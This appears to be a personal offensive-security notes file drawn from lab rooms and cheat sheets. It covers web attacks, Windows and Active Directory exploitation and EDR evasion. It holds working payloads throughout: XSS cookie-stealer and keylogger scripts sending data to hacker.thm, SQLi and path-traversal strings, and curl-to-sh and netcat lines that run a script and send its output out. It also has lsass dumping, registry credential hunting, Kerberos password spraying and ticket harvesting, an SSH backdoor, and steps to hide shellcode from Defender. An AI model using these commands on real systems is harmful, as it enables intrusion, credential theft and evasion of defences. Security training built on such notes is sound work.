add redteam section clean up notes add software reverse engineering section look into maldev academy shell command binwalk Splunk advanced queries. plink - port forwarding attacks **
5 Stages of hacking
-Reconnisance -Scanning and enumeration -Exploitation -Maintaining access -Covering tracks
Durring the pentest of an organization, operators were able to achieve domain admin in 4 hours. Following initial access, the team exploited an outdated machine running Windows 2003 using eternal blue. On this machine the team identified outdated credentials that granted access to the Git EA code repository. From there, pentest personnel identified hard coded credentials to multiple services and escalated privileges using those credentials.
Nmap 3.81 “– interactive” on nmap 3.8 allows a user to run shell as root using “!sh”
Cisco devices - cisco:cisco admin:admin root:root idrac - root:calvin
-- Strace Ltrace
Gtfobins
LOLbins
LOL drivers
KDMapper is a simple tool that exploits a vulnerable (iqvw64e.sys) Intel driver to manually map non-signed drivers in memory
static binaries - https://github.com/andrew-d/static-binaries/tree/master/binaries/linux/x86_64
armitage
Covenant
Powershell Empire and Starkiller
Sliver
Havoc
Contact Form Testing The most preferred entry point for spammers is often a web application’s contact form. Therefore the contact form you have in your web application should be able to identify and prevent such spam attacks. Including CAPTCHA is one of the easiest ways of preventing contact form spamming.
Proxy Server(s) Testing Proxy servers play a huge role in scrutinizing the traffic to your web application and pointing out any malicious activity. Therefore ensure the proxy servers within your network are functioning accurately and efficiently. Tools like Burp Proxy and OWSAP ZAP can go a long way in helping you accomplish this task.
Spam Email Filter Testing Ensure spam email filters are functioning properly. Verify if they are successfully filtering the incoming and outgoing traffic and blocking unsolicited emails. In other words, ensure that email security policies are being enforced properly. Because, as we all know, spam mails are the much-preferred mode of attack for hackers.
Network Firewall Testing Make sure your firewall is preventing undesirable traffic from entering into your web application. Also, ensure the security policies configured using the firewall are being implemented properly. A glitch in your firewall is like sending an invitation to hackers to come and hack your web application.
Security Vulnerability Testing Carry out a thorough security check on various aspects associated with your web application like servers and other such network devices and make a list of the security vulnerabilities they pose. Then find and implement ways to fix them.
Credential Encryption Testing Ensure all usernames and passwords are encrypted and transferred over secure “HTTPS” connection so that these credentials are not compromised by hackers through man-in-the-middle or other such attacks. Because just as your web application needs to be secure, so is the sensitive data being submitted by your clients.
Cookie Testing Cookies store data related to user sessions. Therefore this piece of sensitive information, if it is exposed to the hackers, can result in the security of many users who visit your website or web application being compromised. Therefore ensure your cookie data is not exposed. Or in other words, not available in readable format or as plain text.
Testing For Open Ports Open ports on the web server on which your web application has been hosted also present a good opportunity for hackers to exploit your web application’s security. Therefore carry out this security check and ensure there are no open ports on your web server.
Application Login Page Testing Ensure your web application locks itself up after a specific number of unsuccessful login attempts. This is one of the most basic elements, which, when implemented correctly can go a long way in securing your web application from hackers.
Error Message Testing Ensures all your error messages are generic and do not reveal too much about the problem. If you do so, it’s like announcing to the hacking community, “we have a problem here, you’re welcome to exploit it!” For example: “Invalid Credentials” is fine, but the message should not be specific as “invalid username or password.”
HTTP Method(s) Testing Also review the HTTP methods used by your web application to interact with your clients. Ensure PUT and Delete methods are not enabled, as doing so will allow hackers to easily exploit your web application.
Username and Password Testing Test all the usernames/passwords that are used on your web application. Passwords should be fairly complex and usernames should not be easily guessable. Separate such weak usernames and passwords and alert those users to change them.
File Scanning Ensure all files you upload to your web application or server are scanned before they are uploaded.
goWitness - take screenshots of pages Dirbuster - GUI directory buster Steghide - scan pictures for stenography Infoga - a tool gathering email accounts information (ip,hostname,country,...) from different public sources) Asset finder - id subdomains with asset finder
PSMAPEXEC -- https://github.com/The-Viper-One/PsMapExec
AMNESIAC -- https://github.com/Leo4j/Amnesiac
fuff- ffuf -w “wordlist” -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.19.84/customers/signup -mr "username already exists" # -w selects the file's location The -X argument specifies the request method, The -H argument is used for adding additional headers to the request, The -u argument specifies the URL we are making the request to, the -mr argument is the text on the page we are looking for to validate we've found a valid username.
ffuf -w THMfuff:W1,SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.19.84/customers/login -fc 200, W1 for our list of valid usernames and W2 for the list of passwords we will try. The multiple wordlists are again specified with the -w argument but separated with a comma. For a positive match, we're using the -fc argument to check for an HTTP status code other than 200.
curl 'http://10.10.19.84/customers/reset?email=robert%40acmeitsupport.thm' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=robert'
curl -L https://<10.10.10.10>/linpeas.sh | sh# Excute from memory and send output back to the host
Sqlmap-
WGET
gobuster
gobuster dir -u http://10.10.151.33 -w SecLists/Discovery/Web-Content/directory-list-1.0.txt
Searchsploit
Exploits in search sploit can be found at /usr/share/exploitDB/exploits/
You'll need to test every possible point of entry; these include:
Parameters in the URL Query String
URL File Path
Sometimes HTTP Headers (although unlikely exploitable in practice)
How to test for Stored XSS:
example of these could be:
Comments on a blog
User profile information
Website Listings Dom Based XSS:
is where the JavaScript execution happens directly in the browser without any new pages being loaded or data submitted to backend code.
DOM Based XSS can be challenging to test for and requires a certain amount of knowledge of JavaScript to read the source code. You'd need to look for parts of the code that access certain variables that an attacker can have control over, such as "window.location.x" parameters.
When you've found those bits of code, you'd then need to see how they are handled and whether the values are ever written to the web page's DOM or passed to unsafe JavaScript methods such as eval().
How to test for Blind XSS:
When testing for Blind XSS vulnerabilities, you need to ensure your payload has a call back (usually an HTTP request). This way, you know if and when your code is being executed.
A popular tool for Blind XSS attacks is xsshunter. Although it's possible to make your own tool in JavaScript, this tool will automatically capture cookies, URLs, page contents and more.
Basic poc: <script>alert('XSS');</script>
Session Stealer: <script>fetch('https://hacker.thm/steal?cookie=' + btoa(document.cookie));</script>
Key Logger: <script>document.onkeypress = function(e) { fetch('https://hacker.thm/log?key=' + btoa(e.key) );}</script>
to escape the input tag first so the payload can run properly. You can do this with the following payload: "><script>alert('THM');</script>. The important part of the payload is the "> which closes the value parameter and then closes the input tag.
To escape the textarea tag a little differently from the input one (in Level Two) by using the following payload: </textarea><script>alert('THM');</script>
To escape the existing JavaScript command, so you're able to run your code; you can do this with the following payload ';alert('THM');// which you'll see from the below screenshot will execute your code. The ' closes the field specifying the name, then ; signifies the end of the current command, and the // at the end makes anything after it a comment rather than executable code.
When The word script gets removed from your payload, that's because there is a filter that strips out any potentially dangerous words.When a word gets removed from a string, Try entering the payload <sscriptcript>alert('THM');</sscriptcript> and click the enter button, you'll get an alert popup with the string THM. And then, you'll get a confirmation message that your payload was successful with a link to the next level.
If the < and > characters get filtered out from our payload, preventing us from escaping the IMG tag. To get around the filter, we can take advantage of the additional attributes of the IMG tag, such as the onload event. The onload event executes the code of your choosing once the image specified in the src attribute has loaded onto the web page. Let's change our payload to reflect this /images/cat.jpg" onload="alert('THM'); and then viewing the page source, and you'll see how this will work.
Popup's (<script>alert(“Hello World”)</script>) - Creates a Hello World message popup on a users browser. ;alert(4) ";alert('XSS');// Writing HTML (document.write) - Override the website's HTML to add your own (essentially defacing the entire page). XSS Keylogger (http://www.xss-payloads.com/payloads/scripts/simplekeylogger.js.html) - You can log all keystrokes of a user, capturing their password and other sensitive information they type into the webpage. Port scanning (http://www.xss-payloads.com/payloads/scripts/portscanapi.js.html) - A mini local port scanner (more information on this is covered in the TryHackMe XSS room). https://example.com/urlmessages/leavingTAC.php?destination=https://cnn.com%22%3E%3Cscript%3Ealert(4)%3C/script%3E
Below are some common OS files you could use when testing for directory traversal .
/etc/issue - contains a message or system identification to be printed before the login prompt.
/etc/profile - controls system-wide default variables, such as Export variables, File creation mask (umask), Terminal types, Mail messages to indicate when new mail has arrived
/proc/version - specifies the version of the Linux kernel
/etc/passwd - has all registered user that has access to a system
/etc/shadow - contains information about the system's users' passwords
/root/.bash_history - contains the history commands for root user
/var/log/dmessage - contains global system messages, including the messages that are logged during system startup
/var/mail/root - all emails for root user
/root/.ssh/id_rsa - Private SSH keys for a root or any known valid user on the server
/var/log/apache2/access.log - the accessed requests for Apache webserver
C:\boot.ini - contains the boot options for computers with BIOS firmware
Cyberchef - is a Cyber Swiss Army Knife - a web app for encryption, encoding, compression and data analysis
Crackstation - web hosted tool to crack weak hashes
PHP, using functions such as include, require, include_once, and require_once often contribute to vulnerable web applications. LFI vulnerabilities also occur when using other languages such as ASP, JSP, or even in Node.js
Using null bytes is an injection technique where URL-encoded representation such as %00 or 0x00 in hex with user-supplied data to terminate strings. You could think of it as trying to trick the web app into disregarding whatever comes after the Null Byte.
By adding the Null Byte at the end of the payload, we tell the include function to ignore anything after the null byte which may look like:
include("languages/../../../../../etc/passwd%00").".php"); which equivalent to → include("languages/../../../../../etc/passwd");
NOTE: the %00 trick is fixed and not working with PHP 5.3.4 and above. or the current directory trick at the end of the filtered keyword /.
If we check the warning message in the include(languages/etc/passwd) section, we know that the web application replaces the ../ with the empty string. There are a couple of techniques we can use to bypass this. First, we can send the following payload to bypass it: ....//....//....//....//....//etc/passwd source
if the web application asks to supply input that has to include a directory such as: http://webapp.thm/index.php?lang=languages/EN.php then, to exploit this, we need to include the directory in the payload like so: ?lang=languages/../../../../../etc/passwd.
One requirement for RFI is that the allow_url_fopen option needs to be on
Find an entry point that could be via GET, POST, COOKIE, or HTTP header values!
Enter a valid input to see how the web server behaves.
Enter invalid inputs, including special characters and common file names.
Don't always trust what you supply in input forms is what you intended! Use either a browser address bar or a tool such as Burpsuite.
Look for errors while entering invalid input to disclose the current path of the web application; if there are no errors, then trial and error might be your best option.
Understand the input validation and if there are any filters!
Try the inject a valid entry to read sensitive files
Sample curl syntax:└─$ curl -X POST http://10.10.56.253/challenges/chall1.php -d 'method=GET&file=/etc/flag1/ –output'
../ can be used for csrf
&x= is used to stop the remaining path from being appended to the end of the attacker's URL and instead turns it into a parameter (?x=) on the query string.
Potential SSRF vulnerabilities can be spotted in web applications When a full URL is used in a parameter in the address bar, A hidden field in a form, A partial URL such as just the hostname, Or perhaps only the path of the URL. this is where a lot of trial and error will be required to find a working payload.
If working with a blind SSRF where no output is reflected back to you, you'll need to use an external HTTP logging tool to monitor requests such as requestbin.com, your own HTTP server or Burp Suite's Collaborator client.
Attackers can bypass a Deny List by using alternative localhost references such as 0, 0.0.0.0, 0000, 127.1, 127...*, 2130706433, 017700000001 or subdomains that have a DNS record which resolves to the IP Address 127.0.0.1 such as 127.0.0.1.nip.io.
in a cloud environment, it would be beneficial to block access to the IP address 169.254.169.254, which contains metadata for the deployed cloud server, including possibly sensitive information. An attacker can bypass this by registering a subdomain on their own domain with a DNS record that points to the IP Address 169.254.169.254.
When a full URL is used in a parameter in the address bar:
A hidden field in a form:
A partial URL such as just the hostname:
Or perhaps only the path of the URL:
Some of these examples are easier to exploit than others, and this is where a lot of trial and error will be required to find a working payload. If working with a blind SSRF where no output is reflected back to you, you'll need to use an external HTTP logging tool to monitor requests such as requestbin.com, your own HTTP server or Burp Suite's Collaborator client.
we can enter the following into an sql field.
' OR 1=1;--
'or 1=1--
test' OR 1=1; -- //
blah' or 1=1– // Unauthenticated login
|| + //Used to concatenate
The character ' will close the brackets in the SQL query
'OR' in a SQL statement will return true if either side of it is true. As 1=1 is always true, the whole statement is true. Thus it will tell the server that the email is valid, and log us into user id 0, which happens to be the administrator account.
The -- character is used in SQL to comment out data, any restrictions on the login will no longer work as they are interpreted as a comment. This is like the # and // comment in python and javascript respectively.
sqlmap -u gml.sample.org/grad/neubrew/BFileCommentsOutput.jsp?brewer= comment= type=*
shell operators ;, & and && will combine two (or more) system commands and execute them both
Command injection can be detected in two ways. Blind or Verbose
For blind injection , the ping and sleep commands are significant payloads to test with. Using ping as an example, the application will hang for x seconds in relation to how many pings you have specified.
For blind injection forcing some output. This can be done by using redirection operators such as >.For example, we can tell the web application to execute commands such as whoami and redirect that to a file. We can then use a command such as cat to read this newly created file’s contents.
curl command is a great way to test for command injection.
Verbose command injection is when the application gives you feedback or output as to what is happening or being executed.For example, the output of commands such as ping or whoami is directly displayed on the web application.
In PHP, many functions interact with the operating system to execute commands via shell; these include: Exec, Passthru, System
Command injection payload cheat sheet.
a suite of utilities for managing, diagnosing, troubleshooting, and monitoring Windows environments
Microsoft offers Sysinternals Live, a service that allows you to execute Sysinternals tools directly from the web without downloading them. You can run a tool from Sysinternals Live by typing \\live.sysinternals.com\tools\<toolname> in the Run dialog box (Win+R) or in the Command Prompt.
Process Explorer (procexp.exe): An advanced version of Task Manager that provides detailed information about processes and their dependencies.
Autoruns (autoruns.exe): Shows you what programs are configured to run during system boot-up or login, and the order in which they are launched.
Process Monitor (procmon.exe): A monitoring tool that shows real-time file system, Registry, and process/thread activity.
When using procmon to examine a process look for vectors available for possible abuse examples below
- Process create
- check for processes spawned without specific path - thus allowing an attacker to hijack or proxy code execution.
TCPView (tcpview.exe): Displays all active TCP and UDP endpoints on your system, including the owning process.
BgInfo (bginfo.exe): Automatically displays relevant information about a Windows computer on the desktop's background.
Sysmon (sysmon.exe): Monitors and reports key system activity via the Windows event log, useful for security and forensic analysis.
AccessChk (accesschk.exe): This utility reports the effective permissions for files, registry keys, services, processes, kernel objects, and more.
Disk2vhd (disk2vhd.exe): Creates a Virtual Hard Disk (VHD) version of physical disks for use in Microsoft Virtual PC or Microsoft Hyper-V virtual machines.
PsTools Suite: A set of command-line tools for managing local and remote systems, including pslist, pskill, psexec, and others.
Registry Explorer (regjump.exe): Jump directly to a specific registry key in Regedit.
VMMap (vmmap.exe): Provides a detailed graphical representation of the memory usage of a process.
RAMMap (rammap.exe): An advanced physical memory usage analysis utility.
#LIVING OFF THE LAND WINDOWS ++ Task Scheduler mess with scheduled - taskschd.msc Registry editor analyze reg keys - regedit.exe Active Directory Users and Computers - aduc - search and illuminate users and groups Procdump - can be used to create dumpfile of lsass - procdump.exe -ma lsass.exe
Powershell - C:\Windows\System32\WindowsPowershell\v1.0\
PowerView - https://github.com/darkoperator/Veil-PowerView/blob/master/PowerView/README.md
Get-HostIP - resolves a hostname to an IP
Check-Write - checks if the current user can write to the specified file
Set-MacAttribute - Sets MAC attributes for a file based on another file or input (from Powersploit)
Invoke-CopyFile - copies a local file to a remote location, matching MAC properties
Test-Server - tests connectivity to a specified server
Get-UserProperties - returns all properties specified for users, or a set of user:prop names
Get-ComputerProperties - returns all properties specified for computers, or a set of computer:prop names
Get-LastLoggedOn - return the last logged on user for a target host
Get-UserLogonEvents - returns logon events from the event log for a specified host
Get-UserTGTEvents - returns TGT request events for a specified host
Invoke-CheckLocalAdminAccess - check if the current user context has local administrator access to a specified host
Invoke-SearchFiles - search a local or remote path for files with specific terms in the name
Get-NetDomain - gets the name of the current user's domain
Get-NetForest - gets the forest associated with the current user's domain
Get-NetForestDomains - gets all domains for the current forest
Get-NetDomainControllers - gets the domain controllers for the current computer's domain
Get-NetCurrentUser - gets the current [domain\\]username
Get-NetUser - returns all user objects, or the user specified (wildcard specifiable)
Get-NetUserSPNs - gets all user ServicePrincipalNames
Get-NetOUs - gets data for domain organization units
Invoke-NetUserAdd - adds a local or domain user
Get-NetGroups - gets a list of all current groups in the domain
Get-NetGroup - gets data for each user in a specified domain group
Get-NetLocalGroups - gets a list of localgroups on a remote host or hosts
Get-NetLocalGroup - gets the members of a localgroup on a remote host or hosts
Get-NetLocalServices - gets a list of running services/paths on a remote host or hosts
Invoke-NetGroupUserAdd - adds a user to a specified local or domain group
Get-NetComputers - gets a list of all current servers in the domain
Get-NetFileServers - get a list of file servers used by current domain users
Get-NetShare - gets share information for a specified server
Get-NetLoggedon - gets users actively logged onto a specified server
Get-NetSessions - gets active sessions on a specified server
Get-NetFileSessions - returned combined Get-NetSessions and Get-NetFiles
Get-NetConnections - gets active connections to a specific server resource (share)
Get-NetFiles - gets open files on a server
Get-NetProcesses - gets the remote processes and owners on a remote server
Invoke-UserHunter - finds machines on the local domain where specified users are logged into, and can optionally check if the current user has local admin access to found machines
Invoke-UserHunterThreaded - threaded version of Invoke-UserHunter
Invoke-StealthUserHunter - finds all file servers utilizes in user HomeDirectories, and checks the sessions one each file server, hunting for particular users
Invoke-UserProcessHunter - hunts for processes on domain machines running under specific target user accounts
Invoke-ProcessHunter - hunts for processes with a specific name on domain machines
Invoke-UserEventHunter - hunts for user logon events in domain controller event logs
Get-NetDomainTrusts - gets all trusts for the current user's domain
Get-NetDomainTrustsLDAP - gets all trusts for the current user's domain using just LDAP queries. This is less accurate than Get-NetDomainTrusts butallows you to relay all traffic through your primary DC.
Get-NetForestTrusts - gets all trusts for the forest associated with the current user's domain
Invoke-FindUserTrustGroups - enumerates users who are in groups outside of their principal domain
Invoke-FindAllUserTrustGroups - map all domain trusts and enumerate all users who are in groups outside of their principal domain
Invoke-MapDomainTrusts - try to build a relational mapping of all domain trusts
Invoke-MapDomainTrustsLDAP - try to build a relational mapping of all domain trusts using Get-NetDomainTrustsLDAP
Invoke-Netview - a port of @mubix's netview.exe tool using Get-Net* functionality finds all machines on the local domain and runs various enumeration methods on what it finds
Invoke-NetviewThreaded - threaded version of Invoke-NetView
Invoke-UserView - returns parsable session/loggedon user data for a given domain
Invoke-ShareFinder - finds (non-standard) shares on hosts in the local domain
Invoke-ShareFinderThreaded - threaded version if Invoke-ShareFinder
Invoke-FileFinder - finds potentially sensitive files on hosts in the local domain
Invoke-FileFinderThreaded - threaded version of Invoke-FileFinder
Invoke-FindLocalAdminAccess - finds machines on the domain that the current user has local admin access to
Invoke-FindLocalAdminAccesThreaded- threaded version of Invoke-FindLocalAdminAccess
Invoke-UserFieldSearch - searches a user field for a particular term
Invoke-ComputerFieldSearch - searches a computer field for a particular term
Invoke-FindVulnSystems - finds systems likely vulnerable to MS08-067
Invoke-HostEnum - run all available enumeration checks on a single host
Invoke-EnumerateLocalAdmins - enumerates members of the local Administrators groups across all machines in the domain
Invoke-EnumerateLocalAdminsThreaded - threaded version of Invoke-EnumerateLocalAdmins
CTRL+shift+enter - run as admin
#windows enum
Net user /domain - pull all users
net user - users on the machine
net user <username> - check local group membership
localgroup <username>
Net accounts - password policy
Hostname - find host name
Copy a file from... : copy \\10.10.10.10\kali\reverse.exe C:\PrivEsc\reverse.exe
Identefy stored passwords rundll32.exe jeymgr.dll,KRShowKeyMgr
Search - Get-Childitem c:\ -recurese -inlude "search string "
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type" - Search for specific lines in system info - windows enumeration
wmic qfe - identify patches - windows enumeration
wmic logicaldisk get caption, description, providername
whoami /groups -
whoami /priv
whoami groups
route print - arp table
netstat -ano - identify running ports
sc query windefend - identify the status of defender
sc queryex tyoe= service
netsh advfirewall firewall dump or netsh firewall show state - enumerate windows firewall
schtasks /query /fo LIST /v - look for scheduled tasks that are run by a priv user
#windows post exploitation IEX (New-Object Net.WebClient).DownloadString("http:samplle.com") -OutFile file name C:\windows\system32\inetsrv> findstr /si password
Cleartext Passwords Search for them findstr /si password *.txt findstr /si password *.xml findstr /si password *.ini
#Find all those strings in config files. dir /s pass == cred == vnc == .config
findstr /spin "password" . findstr /spin "password" . In Files These are common files to find them in. They might be base64-encoded. So look out for that.
c:\sysprep.inf c:\sysprep\sysprep.xml c:\unattend.xml %WINDIR%\Panther\Unattend\Unattended.xml %WINDIR%\Panther\Unattended.xml
dir c:*vnc.ini /s /b dir c:*ultravnc.ini /s /b dir c:\ /s /b | findstr /si *vnc.ini In Registry
reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
reg query HKLM /f password /t REG_SZ /s reg query HKCU /f password /t REG_SZ /s
#use procdump to dump lsass procdump.exe -ma lsass.exe
Source: https://safe.menlosecurity.com/https://pentest.coffee/active-directory-lateral-movement-and-post-exploitation-cheat-sheet-3170982a7055
RDP into windows from linux. xfreerdp /u:user /p:password /cert:ignore /v:MACHINE_IP
Registry Keys
Windows Credential Storage: Registry paths like HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets or HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services can hold saved credentials.
AutoLogin Keys: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon (entries like DefaultUserName, DefaultPassword).
Legacy Software Keys: Older software might store credentials in various registry paths depending on the application.
Applocker Get-ApplockerPolicy -Effective -xml Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections $a = Get-ApplockerPolicy -effective $a.rulecollections
AppLocker rules applied to a host can also be read from the local registry at HKLM\Software\Policies\Microsoft\Windows\SrpV2.
Freeze is a payload toolkit for bypassing EDRs using suspended processes, direct syscalls, and alternative execution methods
You can use Freeze to load and execute your shellcode in a stealthy manner.
Git clone the Freeze repo and build it (git clone https://github.com/optiv/Freeze.git && cd Freeze && go build Freeze.go)
1. Generate some shellcode, in this case I used Havoc C2.
2. ./Freeze -I demon.bin -encrypt -O demon.exe
3. Profit, no alerts from defender
DC -Synch To fetch secrets, two security permissions are required: "Replicating Directory Changes" (DS-Replication-Get-Changes) and "Replicating Directory Changes All" (DS-Replication-Get-Changes-All).
Obfuscation and Encoding: Common payloads can often be detected by AV software based on their signatures. By obfuscating the payload or encoding it in a way that it is not recognized as malicious until execution, it's possible to evade AV detection.
Packing and Crypting: Packing and crypting the payload can also help to avoid detection. There are various packers and crypters available that can compress or encrypt the executable, making it difficult for AV to analyze.
Living Off the Land (LotL) and LOLBAS: Using built-in system tools and scripts to conduct operations can often bypass AV since these tools are typically trusted by the operating system. This includes using PowerShell, WMI, and other administrative tools that are less likely to be flagged by AV software.
Fileless Attacks: Conducting attacks that do not rely on files and instead execute directly in memory can bypass traditional file scanning by AV solutions.
Polymorphic and Metamorphic Malware: These types of malware change their code as they spread, making it difficult for AVs to recognize them using traditional signature-based detection methods.
Timing-Based Evasion: Some penetration testers find success by timing the execution of their payloads to avoid detection, such as when AV software may be updating or scanning other parts of the system.
Trusted and Signed Binaries: Using binaries that are signed with a trusted certificate can sometimes allow code to execute without being inspected closely by the AV, as the software may trust signed code more than unsigned.
Research and Testing: Continuously researching the latest AV evasion techniques and testing them in a controlled environment to see what works against current AV engines.
Behavioral Evasion: Since EDR systems often use behavioral analysis to detect malicious activity, one approach is to mimic normal user behavior to avoid triggering alerts.
Misconfiguration Exploitation: EDR systems can sometimes be misconfigured. During an authorized test, security professionals may seek to identify and exploit these misconfigurations to bypass the EDR.
Process Injection: Injecting malicious code into legitimate processes can sometimes bypass EDR monitoring, as the process itself is usually trusted.
Process Hollowing: This involves creating a new process in a suspended state, removing its memory, and replacing it with malicious code. When the process resumes, it may bypass the EDR as it appears as a legitimate process.
Direct System Calls: Invoking system calls directly, rather than using the higher-level API functions that EDRs monitor, can sometimes evade detection.
Rootkits: Advanced rootkits can operate at a low level on a computer system, potentially allowing them to evade EDR systems by hiding their presence.
Memory Exploits: Exploiting vulnerabilities that allow for the execution of code directly in memory can sometimes bypass the file-based monitoring of EDR systems.
Custom Malware: Creating unique malware that hasn't been encountered by an EDR can be a way to bypass its signatures and heuristics.
Tool and Script Modification: Modifying existing tools and scripts to alter their behavior or obfuscate their intent can help in evading EDRs that are signature-based.
Encryption and Obfuscation: Encrypting or obfuscating command and control communication can bypass network-based detection mechanisms of EDR systems.
Decoy Processes: Creating decoy processes can distract the EDR system while the actual malicious process runs undetected.
Living Off the Land (LotL) Techniques: Using built-in system tools to carry out attacks can avoid detection as these tools are usually whitelisted by EDR systems.
Timestomping: Modifying timestamps of files to evade detection based on the time of creation or modification.
Start an SMB server "sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali ."
scp important.txt [email protected]:/home/ubuntu/transferred.txt
wget http://127.0.0.1:8000/file
Find a file -- find . -name thisfile.txt
errors will be deleted automatically --2>dev/null:
Ipconfig /all
ls -lah
FIND is for searching files and directories using filters
sudo -l List the programs which sudo allows your user to run
id command in Linux is used to find out user and group names and numeric ID’s (UID or group ID) of the current user or any other user in the server. This command is useful to find out the following information as listed below:
User name and real user id.
Find out the specific Users UID.
Show the UID and all groups associated with a user.
List out all the groups a user belongs to.
Display security context of the current user.
head/tail - to cat the first or last 10 lines of a file. -n can be used to show a specific number of lines.
ID kenrnal version - uname -a OR cat /proc/version OR cat /etc/issue
chmod command is used to change the access mode of a file.
Options Description
`-R` Apply the permission change recursively to all the files and directories within the specified directory.
`-v` It will display a message for each file that is processed. while indicating the permission change that was made.
`-c` It works same as `-v` but in this case it only displays messages for files whose permission is changed.
`-f` It helps in avoiding display of error messages.
`-h` Change the permissions of symbolic links instead of the files they point to.
Operators Definition
`+` Add permissions
`-` Remove permissions
`=` Set the permissions to the specified values
The following letters that can be used in symbolic mode:
Letters Definition
`r` Read permission
`w` Write permission
`x` Execute permission
The following Reference that are used:
Reference Class
u Owner
g Group
o Others
a All (owner,groups,others)
John the ripper
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Generate a new password hash with a password of your choice:
mkpasswd -m sha-512 newpasswordhere
manual ping sweep - for i in $(seq 254); do ping 10.0.0.${i} -c1 -W1 & done | grep from
find strings of IPaddrs grep -E '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' ips.txt
-B show # number of lines before keyword
-A show lines after keyword
-C show x number of lines before and after keyword
:w writes the contents of the work buffer to the file
:q quit
:q! quit without saving changes
ZZ save and quit
:wq save and quit
:w filename saves to filename (allows you to change the name of the file)
i insert text before cursor
esc quit text edit
exploitdb - /usr/share/exploitdb
wordlists - /usr/share/wordlists
ssh config - /etc/ssh/sshd_confign
lsass - mimikatz
lsass - nanodump
Bloodhound
Kerbrute - Enumerate users on domain \\ ./kerbrute_linux_amd64 userenum --dc 10.10.251.86 -d spookysec.local /home/jon/Desktop/attacktivedirectory_usrlist
Rubeus - Rubeus is a powerful tool for attacking Kerberos. Brute-Forcing / Password-Spraying w/ Rubeus, Harvesting Tickets w/ Rubeus. Before password spraying with Rubeus, you need to add the domain controller domain name to the windows host file. You can add the IP and domain name to the hosts file from the machine by using the echo command: echo 10.10.251.247 CONTROLLER.local >> C:\Windows\System32\drivers\etc\hosts Password spray attack. Rubeus.exe brute /password:”Password”1 /noticket.Kerberoast command : rubeus.exe kerberoast\\ This command will harvest for TGTs (ticket granting tickets)every 30 seconds Rubeus.exe harvest /interval:30
Rubeus
Rubeus is a powerful tool for attacking Kerberos. Brute-Forcing / Password-Spraying w/ Rubeus, Harvesting Tickets w/ Rubeus Before password spraying with Rubeus, you need to add the domain controller domain name to the windows host file. You can add the IP and domain name to the hosts file from the machine by using the echo command: echo 10.10.251.247 CONTROLLER.local >> C:\Windows\System32\drivers\etc\hosts Password spray attack. Rubeus.exe brute /password:”Password”1 /noticket Kerberoast command : rubeus.exe kerberoast / This command will harvest for TGTs (ticket granting tickets)every 30 seconds Rubeus.exe harvest /interval:30
AS-REP Roasting dumps the krbasrep5 hashes of user accounts that have Kerberos pre-authentication disabled. Unlike Kerberoasting these users do not have to be service accounts the only requirement to be able to AS-REP roast a user is the user must have pre-authentication disabled.
SMBclient Enumerate SMB smbclient -L 10.10.9.47 -U
crackmap See if we have access to shares crackmapexec smb 10.10.9.47 -u guest -p "" --shares Module: -M spider_plus Dont forget to use Crack map modules module will directory walk
Enum4linux Use this tool to enumerate available ports. Can be used for active directory Enum4linux -a Use argument | tee “file name” to export as a file
SMBclient Connect to shares smbclient -U '%' -N \\\ # null session to connect to a windows share OR smbclient -U '' \\\ # authenticated session to connect to a windows share (you will be prompted for a password)
Scan SMB version - Auxiliary > scammer/smb/smb_version Bruteforce or password spray AD - auxillary > scanner/smb/smb_login
SMBclient To list file share Smbclient -L \\...\ To travel to a directory append the directory name after the “\” Finding the IP for * in windows https://networking.grok.lsu.edu/article.aspx?articleid=14842
AD Attack Privilege Requirements - Kerbrute Enumeration - No domain access required Pass the Ticket - Access as a user to the domain required Kerberoasting - Access as any user required AS-REP Roasting - Access as any user required Golden Ticket - Full domain compromise (domain admin) required Silver Ticket - Service hash required Skeleton Key - Full domain compromise (domain admin) required
Definitions
Kerberos is the default authentication service for Microsoft Windows domains. Use enum4linux to enumerate active ports 135/445.
Use secretsdump.py to dumpto retrieve all of the password hashes that this user account has to offer - example: python3 secretsdump.py spookysec.local/backup:[email protected] -just-dc-user Administrator
Attacking Active Directory
Use Kerbrute to Identify usernames associated with active directory domain.
Use Smb Client to enumerate SMB ports 139/445 using crackmapexec, smbclient and smbmap
Use Crackmap to determine access to shares Dont forget to use modules . module -M spider_plus
If access is gained to a user account Rubeus can be used to harvest and bruteforce tickets.
Impacket can also be used to kerbroast using getuserspn.py (this file is located in the /examples folder in impacket)
Source: https://safe.menlosecurity.com/https://pentest.coffee/active-directory-cheat-sheet-94e0bb9bed2
Backdooring the SSH Add an ssh key into the ~/.ssh folder.
ssh-keygen write the content of ~/.ssh/id_rsa.pub into ~/.ssh/authorized_keys set the right permission, 700 for ~/.ssh and 600 for authorized_keys
chmod u+s could be used by a higher level user to grant an arbitrary command or file higher privleges. Then
To create a new cron job, run the following command in the terminal which edits the crontab file:
crontab -e
You can stop a single cron job by removing its line from the crontab file. To do that, run the crontab -e command and then delete the line for the specific task. Alternatively, you can stop the cron job by commenting it out in the crontab file. example: 44 3 * * * echo "hello world" > hello.txt
In our example, the value for minute is 44, and the value for hour is 3. The * sign means always. Using the * value for the day field means every day, and using the * value for the month field means every month. Setting the value for weekday to * means the job will run every day from Sunday to Saturday.
The sixth field provides the actual job or command to be executed at the scheduled time. In the case of our example, the command is echo "hello world" > hello.txt.
cat /etc/crontab
nc -lvnp 9002 | tee linpeas.out #Host curl 10.10.14.20:8000/linpeas.sh | sh | nc 10.10.14.20 9002 #Victim
If you have a firmware and you want to analyze it with linpeas to search for passwords or bad configured permissions you have 2 main options.
